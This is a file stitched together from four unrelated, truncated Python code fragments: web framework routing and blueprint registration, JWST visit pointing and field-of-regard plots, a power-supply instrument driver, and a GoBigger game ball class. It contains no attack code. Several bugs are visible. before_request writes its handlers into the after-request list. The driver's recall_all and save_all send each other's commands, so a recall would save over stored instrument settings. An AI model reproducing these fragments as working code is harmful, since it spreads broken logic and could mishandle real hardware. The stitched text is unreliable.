endpoint = str(endpoint)
else:
raise TypeError(
f'`endpoint` can be given as `str` instance, got {endpoint.__class__.__name__}.'
)
if type(rule) is str:
pass
elif isinstance(rule, str):
rule = str(rule)
else:
raise TypeError(
f'`rule` can be given as `str` instance, got {rule.__class__.__name__}.'
)
rule_processed = tuple(
maybe_typed_rule_part(rule_part) for rule_part in URL(rule).parts
)
if rule_processed and (rule_processed[0] == DUMMY_RULE_PART):
rule_processed = rule_processed[1:]
for parameter_type, parameter_name in rule_processed[:-1]:
if parameter_type == PARAMETER_TYPE_PATH:
raise TypeError(
f'Only last rule part can be `path` type, got {rule!r}.'
)
if provide_automatic_options:
request_methods, parameters, subdomain = _validate_options(options)
if request_methods is None:
request_methods = set()
request_methods.add(METHOD_GET)
else:
request_methods = None
parameters = None
subdomain = None
parameters = _merge_parameters(parameters, view_func_parameters)
actual_rule = self.rules.get(endpoint, None)
if actual_rule is None:
rule = Rule(
rule_processed,
real_func,
view_func_positional_parameter_names,
view_func_keyword_parameter_names,
view_func_kwargs_parameter_supported,
endpoint,
request_methods,
parameters,
subdomain,
)
self.rules[endpoint] = rule
return rule
if isinstance(actual_rule, Rule):
folder = RuleFolder.from_rule(actual_rule)
folder.add_rule(rule_processed, request_methods, parameters, subdomain)
self.rules[endpoint] = folder
return folder
# if isinstance(actual_rule, RuleFolder):
actual_rule.add_rule(rule_processed, request_methods, parameters, subdomain)
return actual_rule
def after_request(self, after_request_function):
"""
Registers an after request function. After request functions are ensured to modify the response object.
Parameters
----------
after_request_function : `async-callable`
Should accept the following parameters
+-------------------+-----------------------+-----------------------+
| Respective name | Type | Description |
+===================+=======================+=======================+
| response | ``ServerResponse`` | The response object. |
+-------------------+-----------------------+-----------------------+
Returns
-------
after_request_function : `async-callable`
Raises
------
TypeError
- If `after_request_function` was not given as `callable`.
- If `after_request_function` was not given as `async-callable`.
- If `after_request_function` accepts less or more than 1 positional parameters.
"""
_analyze_handler(after_request_function, 'after_request_function', 1)
after_request_functions = self.after_request_functions
if after_request_functions is None:
self.after_request_functions = after_request_functions = []
after_request_functions.append(after_request_function)
return after_request_function
def before_request(self, before_request_function):
"""
Registers a function which should run before a request is done.
If any before request processor returns a non `None` value, then the request processing will stop and that
return will be sent as response.
Parameters
----------
before_request_function : `async-callable`
No parameters are passed to before request functions.
Returns
-------
before_request_function : `async-callable`
Raises
------
TypeError
- If `before_request_function` was not given as `callable`.
- If `before_request_function` was not given as `async-callable`.
- If `before_request_function` accepts less or more than 1 positional parameters.
"""
_analyze_handler(before_request_function, 'before_request_function', 0)
before_request_functions = self.before_request_functions
if before_request_functions is None:
self.after_request_functions = before_request_functions = []
before_request_functions.append(before_request_function)
return before_request_function
def error_handler(self, error_code):
"""
Registers an error handler which run when an http exception is raised from a view.
Parameters
----------
error_code : `int`
Http error code.
Raises
------
TypeError
If `error_code` was not given as `int` instance.
Returns
-------
route_adder : ``_ErrorHandlerAdder``
"""
if type(error_code) is int:
pass
elif isinstance(error_code, int):
error_code = int(error_code)
else:
raise TypeError(
f'`error_code` can be given as `int` instance, got {error_code.__class__.__name__}.'
)
return _ErrorHandlerAdder(self, error_code)
def _error_handler(self, error_code, error_handler_function):
"""
Registers an error handler to the webapp. Called by ``_ErrorHandlerAdder``, what is returned by
``.error_handler``.
Parameters
----------
error_code : `int`
Http error code. Should be already validated.
error_handler_function : `async-callable`
An async function to call when an http exception is raised.
Should accept following parameters:
+-------------------+-------------------+---------------------------+
| Respective name | Type | Description |
+===================+===================+===========================+
| exception | ``AbortRequest`` | The occurred exception. |
+-------------------+-------------------+---------------------------+
Returns
-------
error_handler_function : `async-callable`
Raises
------
TypeError
- If `error_handler_function` was not given as `callable`.
- If `error_handler_function` was not given as `async-callable`.
- If `error_handler_function` accepts less or more than 1 positional parameters.
"""
_analyze_handler(error_handler_function, 'error_handler_function', 0)
error_handler_functions = self.error_handler_functions
if error_handler_functions is None:
self.error_handler_functions = error_handler_functions = {}
error_handler_functions[error_code] = error_handler_function
return error_handler_function
def url_defaults(self, url_default_function):
"""
Registers a keyword parameter processor for ``url_for``.
Parameters
----------
url_default_function : `async-callable`
Should accept the following parameters
+-------------------+---------------------------+-------------------------------------------------------+
| Respective name | type | Description |
+===================+===========================+=======================================================+
| endpoint | `None` or `str` | The endpoint what matched the request url. |
+-------------------+---------------------------+-------------------------------------------------------+
| kwargs | `dict` of (`str`, `Any`) | Additional keyword parameters passed to ``url_for``. |
+-------------------+---------------------------+-------------------------------------------------------+
Returns
-------
url_default_function : `async-callable`
Raises
------
TypeError
- If `url_default_function` was not given as `callable`.
- If `url_default_function` was not given as `async-callable`.
- If `url_default_function` accepts less or more than 2 positional parameters.
"""
_analyze_handler(url_default_function, 'url_default_function', 2)
url_default_functions = self.url_default_functions
if url_default_functions is None:
self.url_default_functions = url_default_functions = []
url_default_functions.append(url_default_function)
return url_default_function
def url_value_preprocessor(self, url_value_preprocessor):
"""
Registers a preprocessor which can modify the parameters matched from the url.
Parameters
----------
url_value_preprocessor : `async-callable`
Should accept the following parameters
+-------------------+---------------------------+-----------------------------------------------+
| Respective name | Type | Description |
+===================+===========================+===============================================+
| endpoint | `None` or `str` | The endpoint what matched the request url. |
| | | Set as `None` if exception occurred. |
+-------------------+---------------------------+-----------------------------------------------+
| parameters | `dict` of (`str`, `Any`) | Parameters parsed from the request url. |
+-------------------+---------------------------+-----------------------------------------------+
Returns
-------
url_value_preprocessor : `async-callable`
Raises
------
TypeError
- If `url_value_preprocessor` was not given as `callable`.
- If `url_value_preprocessor` was not given as `async-callable`.
- If `url_value_preprocessor` accepts less or more than 2 positional parameters.
"""
_analyze_handler(url_value_preprocessor, 'url_value_preprocessor', 2)
url_value_preprocessors = self.url_value_preprocessors
if url_value_preprocessors is None:
self.url_value_preprocessors = url_value_preprocessors = []
url_value_preprocessors.append(url_value_preprocessor)
return url_value_preprocessor
def register_blueprint(self, blueprint, **options):
"""
Registers a blueprint into the application.
Parameters
----------
parent : ``Blueprint``
The parent blueprint or webapp to register self to.
**options : Keyword parameters
Extra options to overwrite the blueprint's.
Other Parameters
----------------
url_prefix : `None` or `str`
Url prefix for a blueprint.
subdomain : `None` or `str`
Subdomain for the blueprint.
url_defaults : `None`, `dict` of (`str`, `Any`) items or (`set`, `list`, `tuple`) of (`str`, `Any`) items
Parameters which the routes of the blueprint will get by default.
Raises
------
TypeError
- If `blueprint was not given as ``Blueprint`` instance.
- If `url_prefix` was neither given as `None` or as `str` instance.
- If `url_prefix` contains a `path` rule part.
- If `subdomain` was not given neither as `None` or `str` instance.
- If `parameters` is neither `None`, `dict`, `list`, `set` or `tuple`.
- If `parameters` contains a non `tuple` element.
- If `options` contains extra parameters.
ValueError
If `parameters` contains an element with length of not `2`.
"""
blueprint_state = BlueprintState(blueprint, options)
blueprints = self.blueprints
if blueprints is None:
self.blueprints = blueprints = []
blueprints.append(blueprint_state)
class BlueprintState:
"""
Represents options with what an a blueprint is added, since a blueprint's options can be overwritten.
Attributes
----------
blueprint : ``blueprint``
The wrapped blueprint.
url_prefix : `None` or `tuple` of `tuple` (`str`, `int`)
Url prefix for all the routes of the blueprint. Set as `None` if not applicable.
subdomain : `None` or `str`
Subdomain, what the routes of the blueprint gonna match.
parameters : `None` or `tuple` of `tuple` (`str`, `Any`)
Parameters which the routes of the blueprint will get by default.
"""
__slots__ = ('blueprint', 'url_prefix', 'subdomain', 'parameters')
def __new__(cls, blueprint, options):
"""
Creates a new blueprint state form the given blueprint and extra options.
Parameters
----------
blueprint : ``AppBase``
The blueprint create overwrite state from.
options : `None` or `dict` of (`str`, `Any`) items
Extra options
Raises
------
TypeError
- If `blueprint was not given as ``Blueprint`` instance.
- If `url_prefix` was neither given as `None` or as `str` instance.
- If `url_prefix` contains a `path` rule part.
- If `subdomain` was not given neither as `None` or `str` instance.
- If `parameters` is neither `None`, `dict`, `list`, `set` or `tuple`.
- If `parameters` contains a non `tuple` element.
- If `options` contains extra parameters.
ValueError
If `parameters` contains an element with length of not `2`.
"""
if not isinstance(blueprint, Blueprint):
raise TypeError(
f'`blueprint` can | |
astropy.wcs.WCS(img_hdu[0].header)
# -- Setup plot and axes
if subplotspec is None:
plt.figure(figsize=(16, 9))
ax = plt.subplot(projection=wcs)
else:
ax = plt.subplot(subplotspec, projection=wcs)
# -- Display the 2MASS image
norm = astropy.visualization.ImageNormalize(img_hdu[0].data,
interval=astropy.visualization.PercentileInterval(99.99),
stretch=astropy.visualization.AsinhStretch(a=0.001))
plt.imshow(img_hdu[0].data, cmap='magma', norm=norm, origin='lower',
zorder=-50) # negative zorder to be below pysiaf aperture fill zorder
# use colormap to shade each visit distinctly:
cmap = matplotlib.cm.cool
for i, visit in enumerate(visitlist):
slew = visit.slew
# Compute expected V3PA
v3pa_at_gs = visit.slew.GSPA + (0 if visit._no_gspa_yoffset else fgs_aperture.V3IdlYAngle)
if slew.GUIDEMODE != 'COARSE':
raise RuntimeError("We only expect coarse point for OTE-01 mosaic tiles")
# we only have a science attitude
attmatsci = visit.get_attitude_matrix(step='slew')
gsoffset = np.zeros(2) # start with 0,0 offsets initially at start of visit
centers = []
for iact, act in enumerate(visit.activities):
if act.scriptname == 'NRCMAIN':
# Draw NIRCam apertures
for apername in visit.apertures_used():
if apername.startswith('NRS'):
continue # ignore parallel nirspec darks from NO-12
# look up aperture from that aperture name
aper_key = apername[0:4] if apername.startswith("M") else apername[
0:3] # NRC, NRS, NIS, FGS, or MIRI
aperture = SIAFS[aper_key][apername]
col = cmap(i / len(visitlist))
# plot at the correct attitude
aperture.set_attitude_matrix(attmatsci)
centers.append(aperture.sci_to_sky(1024, 1024))
aperture.plot(frame='sky', transform=ax.get_transform('icrs'),
color=col, fill_color=col, fill=True, fill_alpha=0.2)
if aperture.AperName == 'NRCA3_FULL':
c0, c1 = aperture.det_to_sky(1024, 1024)
plt.text(c0, c1, f"v{i:03d}a{iact:1d}",
color='white', transform=ax.get_transform('icrs'), horizontalalignment='left')
elif act.scriptname == 'SCSAMMAIN':
gsoffset[0] += act.FGS1DELTAX
gsoffset[1] += act.FGS1DELTAY
attmatsci = visit.get_attitude_matrix(step='slew', fgs_delta_from_sam=gsoffset)
if title:
plt.title(f"Visit file pointings for {title}")
if crop_for_no12:
# Hack: hard-coded zoom for NO-12 OTE-01 test
ax.set_xlim(424, 1024)
ax.set_ylim(150, 750)
plt.text(0.01, 0.01, "Labels show visit:activity in each NRCA3 pointing", color='white',
transform=ax.transAxes)
def plot_gs_id_references(activity_statement):
""" Plot reference stars used for guide star ID
To do so we have to convert from detector coordinates to sky coordinates
"""
##--- Functions for plotting the visit field of REGARD
def plot_circle_coords(x1, x2, from_frame, to_frame, ax, **plot_kwargs):
"""Plot a circle (great or otherwise) with astronomical coordinate transforms"""
# make a circle of coords
from_plane = coords.SkyCoord(x1, x2, unit='deg', frame=from_frame)
return plot_coords_in_frame(from_plane, ax, to_frame, **plot_kwargs)
def plot_coords_in_frame(skycoords, ax, to_frame, **plot_kwargs):
""" Plot in ICRS or Barycentric coordinates, with appropriate transformations
"""
coords_in_frame = skycoords.transform_to(to_frame)
# pull out what we want to plot
if to_frame == 'icrs' or to_frame == 'gcrs':
plot_x = coords_in_frame.ra.wrap_at('180d').radian
plot_y = coords_in_frame.dec.radian
elif to_frame == 'geocentricmeanecliptic' or to_frame=='barycentricmeanecliptic':
plot_x = coords_in_frame.lon.wrap_at('180d').radian
plot_y = coords_in_frame.lat.radian
else:
raise ValueError("Unsupported Frame")
# note we MUST FLIP THE SIGN FOR X, since matplotlib map projections
# don't let us make R.A. increase to the left
ax.plot(-plot_x, plot_y, **plot_kwargs)
def show_field_of_regard_ecliptic(visit, datetime=None, projection='lambert', subplotspec=None, show_sun=False):
"""Plot JWST field of regard
Lotsa complicated stuff here with map projections and coordinates...
"""
if datetime is None:
# What date/time are we generating this plot for?
datetime = visit.time_early # astropy.time.Time.now()
# Determine where the sun will be then.
# NOTE - this is the apparent position as seen from Earth, and may be off by up to ~0.3 deg from the
# perspective of JWST in its large orbit around L2. This is not a high accuracy calculation.
sun = coords.get_sun(datetime).transform_to('geocentricmeanecliptic')
center_longitude = sun.lon.radian+np.pi
subplot_kwargs = {'projection': projection}
if projection=='lambert':
# Need to flip sign on center longitude, because of R.A. convention
subplot_kwargs['center_longitude']= -center_longitude
if subplotspec is None:
ax = plt.subplot(**subplot_kwargs)
else:
ax = plt.subplot(subplotspec, **subplot_kwargs)
ax.set_xticklabels([])
ax.grid(True)
#
# if 0:
# # Now do a fill-between for those two circles.
# # This is tedious since we need to convert to Cartesian for fill_between
# n=100
# x = np.linspace(-ro, ro, n)
# y2 = np.sqrt(ro**2-x**2)
# y1 = np.zeros_like(x)
# w = np.abs(x) < ri
# y1[w] = np.sqrt(ri**2-x[w]**2)
#
# plt.fill_between(x+0.5, y1+0.5, y2+0.5, color='green', alpha=0.1, transform=ax.transAxes,)
# plt.fill_between(x+0.5, -y1+0.5, -y2+0.5, color='green', alpha=0.1, transform=ax.transAxes,)
#
# plot_circle_coords(np.arange(361), np.zeros(361), 'galactic', 'barycentricmeanecliptic', ax,
# ls='none',marker='.', markersize=2, color='maroon', alpha=0.3)
#
# plot_circle_coords(np.arange(361)-180, np.zeros(361), 'centricmeanecliptic', 'geocentricmeanecliptic', ax,
# ls='none',marker='.', markersize=2, color='black', alpha=0.3)
#
# #ecliptic_plane = coords.SkyCoord( np.arange(361)-180, np.zeros(361), unit='deg', frame='barycentricmeanecliptic')
# #ax.plot(ecliptic_plane.lon.wrap_at('180d').radian, ecliptic_plane.lat.radian, ls='none',
# # marker='.', markersize=2, color='black', alpha=0.3)
#
# # Show the target pointing!
# gs = coords.SkyCoord(visit.slew.GSRA, visit.slew.GSDEC, unit='deg')
# plot_coords_in_frame(gs, ax, 'barycentricmeanecliptic', marker='*',color='red', markersize=20,)
#
#
# plt.plot(antisun.lon.radian, antisun.lat.radian, marker='+', color='black', markersize=10, markeredgewidth=3,)
# Annotate
if projection == 'lambert':
plt.text(0.5, 0.55, 'anti-sun', transform=ax.transAxes, color='black', horizontalalignment='center')
plt.text(0.5, 0.5+0.38, 'N CVZ', transform=ax.transAxes, color='blue')
plt.text(0.5, 0.5-0.38, 'S CVZ', transform=ax.transAxes, color='blue', verticalalignment='top')
#plt.text(0.99, 0.01, f"JWST field of regard\non {datetime.to_value('iso',subfmt='date')}\n[Ecliptic coords]",
# transform=ax.transAxes, horizontalalignment='right')
plt.title(f"JWST field of regard\non {datetime.to_value('iso',subfmt='date')}\n[Ecliptic coords]",)
# Plot all the markers
plot_celestial_markers(visit, ax, 'geocentricmeanecliptic', show_sun=show_sun, datetime=datetime)
return ax
def show_field_of_regard_ra_dec(visit, datetime=None, subplotspec=None, labelaxes=False):
"""Plot celestial sphere in regular RA, Dec
"""
# Setup a map in Mollweide projection and label for RA and Dec.
if subplotspec is None:
ax = plt.gcf().add_subplot( projection='mollweide')
else:
ax = plt.subplot(subplotspec, projection='mollweide')
plt.title(f"R.A., Decl.\n[ICRS Equatorial coords]\n")
if labelaxes:
plt.ylabel("Declination")
plt.xlabel("Right Ascension")
# Replace the standard x ticks (longitude) with R.A., and include sign flip so R.A. increases to left
plt.xticks(ticks=np.radians([-120, -60, 0, 60, 120, 180]),
labels=['8$^h$', '4$^h$', '0$^h$', '20$^h$', '16$^h$', '12$^h$'])
ax.grid(True)
# Plot all the markers
# Use GCRS coordinates, which is like ICRS but references to Earth; this only matters substantially for
# the sun coordinates in this case.
plot_celestial_markers(visit, ax, 'gcrs', datetime=datetime)
return ax
def plot_celestial_markers(visit, ax, frame='gcrs', datetime=None, show_sun=True):
"""Main routine to plot celestial markers for sun, target, and various circles
"""
if datetime is None:
# What date/time are we generating this plot for?
datetime = visit.time_early # astropy.time.Time.now()
# Determine where the sun will be then.
# NOTE - this is the apparent position as seen from Earth, and may be off by up to ~0.3 deg from the
# perspective of JWST in its large orbit around L2. This is not a high accuracy calculation.
sun = coords.get_sun(datetime).transform_to(frame)
# Draw the sun, and anti-sun point
antisun = sun.directional_offset_by(0, 180*u.deg)
if show_sun: # it's less useful to show this in the lambert ecliptic proj
plot_coords_in_frame(sun, ax, frame, marker='o', markersize=20, color='orange', markeredgecolor='orange', zorder=10)
plot_coords_in_frame(antisun, ax, frame, marker='+', markersize=10, color='black', markeredgewidth=3,)
# Draw galactic and ecliptic planes
# JWST's CVZs are defined by the Barycentric version of the ecliptic plane.
plot_circle_coords(np.arange(361), np.zeros(361), 'galactic', frame, ax,
ls='none',marker='.', markersize=2, color='maroon', alpha=0.3)
plot_circle_coords(np.arange(361)-180, np.zeros(361), 'barycentricmeanecliptic', frame, ax,
ls='none',marker='.', markersize=2, color='black', alpha=0.3)
# Draw the CVZs
for ecliptic_lat in [85, -85]:
plot_circle_coords(np.arange(361) - 180, np.zeros(361)+ecliptic_lat, 'barycentricmeanecliptic', frame, ax,
ls='none', marker='.', markersize=0.5, color='blue', alpha=0.3)
# Shade the allowed field of regard.
# Given hassles with plotting filled shapes in map projections, a relatively straightforward way to do this
# ends up being to rasterize a grid over the sky, and scatter plot those points densely
n = 180
lat, lon = np.meshgrid(np.linspace(-np.pi, np.pi, 2 * n), np.linspace(-np.pi / 2, np.pi / 2, n))
skymesh = astropy.coordinates.SkyCoord(lat, lon, frame=frame, unit='rad')
#field_of_regard_mask = (seps > 85 * astropy.units.deg) & (seps < 135 * astropy.units.deg)
pas = np.arange(360) * u.deg
for offset in [85, 145]:
for_edge = sun.directional_offset_by(pas, offset*u.deg)
plot_coords_in_frame(for_edge, ax, frame, marker='.',color='green', markersize=1, ls='none')
for offset in np.linspace(86, 144, 50):
for_circ = sun.directional_offset_by(pas, offset * u.deg)
plot_coords_in_frame(for_circ, ax, frame, marker='o', color='#E5F2E5', markersize=1, ls='none', zorder=-30)
#
# if 0:
# with warnings.catch_warnings():
# # Temporarily ignore any benign warnings of math errors in the following call
# warnings.simplefilter("ignore")
# # Note, must flip sight on X coord given matplotlib convention vs. RA
# if 'ecliptic' in frame:
# plt.scatter(-lat[field_of_regard_mask], lon[field_of_regard_mask], color='#E5F2E5', zorder=-1000);
# else:
# plt.scatter(-skymesh[field_of_regard_mask].ra.wrap_at('180d').radian,
# skymesh[field_of_regard_mask].dec.radian, color='#E5F2E5', zorder=-1000);
# Show the target pointing!
gs = coords.SkyCoord(visit.slew.GSRA, visit.slew.GSDEC, unit='deg', frame='icrs')
plot_coords_in_frame(gs, ax, frame, marker='*',color='red', markersize=20,)
gal_center = astropy.coordinates.SkyCoord(0, 0, unit='deg', frame='galactic').transform_to('icrs')
plot_coords_in_frame(gal_center, ax, frame, marker='o', markersize=5, color='maroon')
# Extra markers to plot while debugging transforms
#origin = coords.SkyCoord(0, 0, unit='deg', frame='icrs')
#one = coords.SkyCoord(15, 0, unit='deg', frame='icrs')
#plot_coords_in_frame(origin, ax, frame, marker='^',color='green', markersize=20,)
#plot_coords_in_frame(one, ax, frame, marker='^',color='lightgreen', markersize=20,)
#two = coords.SkyCoord(-30, 0, unit='deg', frame='icrs')
#plot_coords_in_frame(two, ax, frame, marker='^',color='darkgreen', markersize=20,)
def show_pitch_roll(visit, subplotspec_pitch=None, subplotspec_roll=None):
""" Plot pitch and roll relative to the sun
We here distinguish between | |
3 turns on immediately
* ``{1: 100, 2: 200, 3: 300}`` :math:`\\rightarrow` channel 1 has a 100-ms delay,
channel 2 has a 200-ms delay and channel 3 has a 300-ms delay
See Also
--------
:meth:`.set_multi_on_delay`
:meth:`.set_multi_on_action`
"""
if options:
if not isinstance(options, dict):
self.raise_exception('The Multi-On options must be a dict, got {}'.format(type(options)))
for channel, value in options.items():
if isinstance(value, bool):
self.set_multi_on_action(channel, 'QUICK' if value else 'NEVER')
else:
self.set_multi_on_action(channel, 'DELAY')
self.set_multi_on_delay(channel, value)
time.sleep(0.1) # otherwise the power supply may not set the delay properly
self._write_and_check('OPALL 1')
def turn_off(self, channel):
"""Turn the output channel off.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
"""
self._write_and_check('OP{} 0'.format(channel))
def turn_off_multi(self, options=None):
"""Turn multiple output channels off (the Multi-Off feature).
Parameters
----------
options : :class:`dict`, optional
Set the Multi-Off option for each output channel before setting Multi-Off.
If not specified then uses the pre-programmed options.
If a particular output channel is not included in `options` then
uses the pre-programmed option for that channel.
The keys are the output channel number and the value can be :data:`False`
(set the channel to ``NEVER``, see the manual for more details), :data:`True`
(set the channel to ``QUICK``, see the manual for more details) or a
delay in milliseconds (as an :class:`int`).
Examples:
* ``{1: False}`` :math:`\\rightarrow` channel 1 does not turn off
* ``{2: 100}`` :math:`\\rightarrow` channel 2 has a 100-ms delay
* ``{1: 100, 3: True}`` :math:`\\rightarrow` channel 1 has a 100-ms delay
and channel 3 turns off immediately
* ``{1: 100, 2: 200, 3: 300}`` :math:`\\rightarrow` channel 1 has a 100-ms delay,
channel 2 has a 200-ms delay and channel 3 has a 300-ms delay
See Also
--------
:meth:`.set_multi_off_delay`
:meth:`.set_multi_off_action`
"""
if options:
if not isinstance(options, dict):
self.raise_exception('The Multi-Off options must be a dict, got {}'.format(type(options)))
for channel, value in options.items():
if isinstance(value, bool):
self.set_multi_off_action(channel, 'QUICK' if value else 'NEVER')
else:
self.set_multi_off_action(channel, 'DELAY')
self.set_multi_off_delay(channel, value)
time.sleep(0.1) # otherwise the power supply may not set the delay properly
self._write_and_check('OPALL 0')
def recall(self, channel, index):
"""Recall the settings of the output channel from the store.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
index : :class:`int`
The store index number, can be 0-49.
See Also
--------
:meth:`.save`
"""
self._write_and_check('RCL{} {}'.format(channel, index))
def recall_all(self, index):
"""Recall the settings for all output channels from the store.
Parameters
----------
index : :class:`int`
The store index number, can be 0-49.
See Also
--------
:meth:`.save_all`
"""
self._write_and_check('*SAV {}'.format(index))
def reset(self):
"""Send the reset, ``*RST``, command."""
self.write('*RST')
def reset_trip(self):
"""Attempt to clear all trip conditions."""
self.write('TRIPRST')
def save(self, channel, index):
"""Save the present settings of the output channel to the store.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
index : :class:`int`
The store index number, can be 0-49.
See Also
--------
:meth:`.recall`
"""
self._write_and_check('SAV{} {}'.format(channel, index))
def save_all(self, index):
"""Save the settings of all output channels to the store.
Parameters
----------
index : :class:`int`
The store index number, can be 0-49.
See Also
--------
:meth:`.recall_all`
"""
self._write_and_check('*RCL {}'.format(index))
def set_current_limit(self, channel, value):
"""Set the current limit of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
value : :class:`float`
The current limit, in Amps.
"""
self._write_and_check('I{} {}'.format(channel, value))
def set_current_meter_averaging(self, channel, value):
"""Set the current meter measurement averaging of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
value : :class:`str`
Can be ``ON``, ``OFF``, ``LOW``, ``MED`` or ``HIGH``.
"""
self._write_and_check('DAMPING{} {}'.format(channel, value))
def set_current_step_size(self, channel, size):
"""Set the current limit step size of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
size : :class:`float`
The current limit step size, in Amps.
"""
self._write_and_check('DELTAI{} {}'.format(channel, size))
def set_multi_on_action(self, channel, action):
"""Set the Multi-On action of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
action : :class:`str`
The Multi-On action, one of ``QUICK``, ``NEVER`` or ``DELAY``.
"""
self._write_and_check('ONACTION{} {}'.format(channel, action))
def set_multi_on_delay(self, channel, delay):
"""Set the Multi-On delay, in milliseconds, of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
delay : :class:`int`
The delay, in milliseconds.
"""
self._write_and_check('ONDELAY{} {}'.format(channel, delay))
def set_multi_off_action(self, channel, action):
"""Set the Multi-Off action of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
action : :class:`str`
The Multi-Off action, one of ``QUICK``, ``NEVER`` or ``DELAY``.
"""
self._write_and_check('OFFACTION{} {}'.format(channel, action))
def set_multi_off_delay(self, channel, delay):
"""Set the Multi-Off delay, in milliseconds, of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
delay : :class:`int`
The delay, in milliseconds.
"""
self._write_and_check('OFFDELAY{} {}'.format(channel, delay))
def set_over_current_protection(self, channel, enable, value=None):
"""Set the over-current protection trip point of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
enable : :class:`bool`
Whether to enable (:data:`True`) or disable (:data:`False`)
the over-current protection trip point.
value : :class:`float`, optional
If the trip point is enabled then you must specify a value, in Amps.
"""
if enable:
if value is None:
self.raise_exception('Must specify the trip point value if the trip point is enabled')
command = 'OCP{channel} ON;OCP{channel} {value}'.format(channel=channel, value=value)
else:
command = 'OCP{} OFF'.format(channel)
self._write_and_check(command)
def set_over_voltage_protection(self, channel, enable, value=None):
"""Set the over-voltage protection trip point of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
enable : :class:`bool`
Whether to enable (:data:`True`) or disable (:data:`False`)
the over-voltage protection trip point.
value : :class:`float`, optional
If the trip point is enabled then you must specify a value, in Volts.
"""
if enable:
if value is None:
self.raise_exception('Must specify the trip point value if the trip point is enabled')
command = 'OVP{channel} ON;OVP{channel} {value}'.format(channel=channel, value=value)
else:
command = 'OVP{} OFF'.format(channel)
self._write_and_check(command)
def set_voltage(self, channel, value, verify=True):
"""Set the output voltage of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
value : :class:`float`
The value, in Volts.
verify : :class:`bool`, optional
Whether to verify that the output voltage has stabilized at
`value` before returning to the calling program.
"""
if verify:
command = 'V{}V {}'.format(channel, value)
else:
command = 'V{} {}'.format(channel, value)
self._write_and_check(command)
def set_voltage_range(self, channel, index):
"""Set the output voltage range of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
index : :class:`int`
The output voltage range index. See the manual for more details.
For example, 2 = 35V/3A.
"""
self._write_and_check('VRANGE{} {}'.format(channel, index))
def set_voltage_step_size(self, channel, size):
"""Set the voltage step size of the output channel.
Parameters
----------
channel : :class:`int`
The output channel. The first output channel is 1 (not 0).
size : :class:`float`
The voltage step size, in Volts.
"""
self._write_and_check('DELTAV{} {}'.format(channel, size))
def set_voltage_tracking_mode(self, mode):
"""Set the voltage tracking mode of the unit.
Parameters
----------
mode : :class:`int`
The voltage tracking mode. See the manual for more details.
"""
self._write_and_check('CONFIG {}'.format(mode))
def _check_event_status_register(self, command):
"""Check the value of the standard event status register for an error.
Parameters
----------
command : :class:`str`
The command that was sent prior to checking for an error.
"""
status = self.event_status_register(as_integer=False)
# Bit 7 - Power On. Set when power is first applied to the instrument.
# Bit 1 and 6 - Not used, permanently 0.
# Bit 0 - Operation Complete. Set in response to the *OPC command.
bit5, bit4, bit3, bit2 = status[2:-2]
if bit5 == '1': # Bit 5 - Command | |
<gh_stars>0
import math
import logging
import uuid
import copy
from easydict import EasyDict
from pygame.math import Vector2
from gobigger.utils import format_vector, add_size, Border, deep_merge_dicts
from .base_ball import BaseBall
from .food_ball import FoodBall
from .thorns_ball import ThornsBall
from .spore_ball import SporeBall
class CloneBall(BaseBall):
"""
Overview:
One of the balls that a single player can control
- characteristic:
* Can move
* Can eat any other ball smaller than itself
* Under the control of the player, the movement can be stopped immediately and contracted towards the center of mass of the player
* Skill 1: Split each unit into two equally
* Skill 2: Spit spores forward
* There is a percentage of weight attenuation, and the radius will shrink as the weight attenuates
"""
@staticmethod
def default_config():
cfg = BaseBall.default_config()
cfg.update(dict(
acc_max=50, # Maximum acceleration
vel_max=25, # Maximum velocity
radius_min=2, # Minimum radius
radius_max=100, # Maximum radius
radius_init=2, # The initial radius of the player's ball
part_num_max=16, # Maximum number of avatars
on_thorns_part_num=10, # Maximum number of splits when encountering thorns
on_thorns_part_radius_max=5, # Maximum radius of split part when encountering thorns
split_radius_min=30, # The lower limit of the radius of the splittable ball
eject_radius_min=30, # The lower limit of the radius of the ball that can spores
recombine_age=30, # Time for the split ball to rejoin (s)
split_vel_init=50, # The initial velocity of the split ball
split_vel_zero_time=0.1, # The time it takes for the speed of the split ball to decay to zero (s)
stop_zero_time=0.1, # The time to zero the speed after using the stop function
size_decay_rate=0.0001, # The size proportion of each state frame attenuation
given_acc_weight=10, # The ratio of actual acceleration to input acceleration
))
return EasyDict(cfg)
def __init__(self, team_name, name, position, border, size=None, vel=None, acc=None,
vel_last=None, acc_last=None, last_given_acc=None, stop_flag=False,
owner=None, spore_settings=SporeBall.default_config(), **kwargs):
# init other kwargs
kwargs = EasyDict(kwargs)
cfg = CloneBall.default_config()
cfg = deep_merge_dicts(cfg, kwargs)
super(CloneBall, self).__init__(name, position, border, size=size, vel=vel, acc=acc, **cfg)
self.vel_max = cfg.vel_max
self.acc_max = cfg.acc_max
self.radius_min = cfg.radius_min
self.radius_max = cfg.radius_max
self.radius_init = cfg.radius_init
self.part_num_max = cfg.part_num_max
self.on_thorns_part_num = cfg.on_thorns_part_num
self.on_thorns_part_radius_max = cfg.on_thorns_part_radius_max
self.split_radius_min = cfg.split_radius_min
self.eject_radius_min = cfg.eject_radius_min
self.recombine_age = cfg.recombine_age
self.split_vel_init = cfg.split_vel_init
self.split_vel_zero_time = cfg.split_vel_zero_time
self.stop_zero_time = cfg.stop_zero_time
self.size_decay_rate = cfg.size_decay_rate
self.given_acc_weight = cfg.given_acc_weight
self.spore_settings = spore_settings
self.cfg = cfg
# normal kwargs
self.team_name = team_name
self.owner = owner
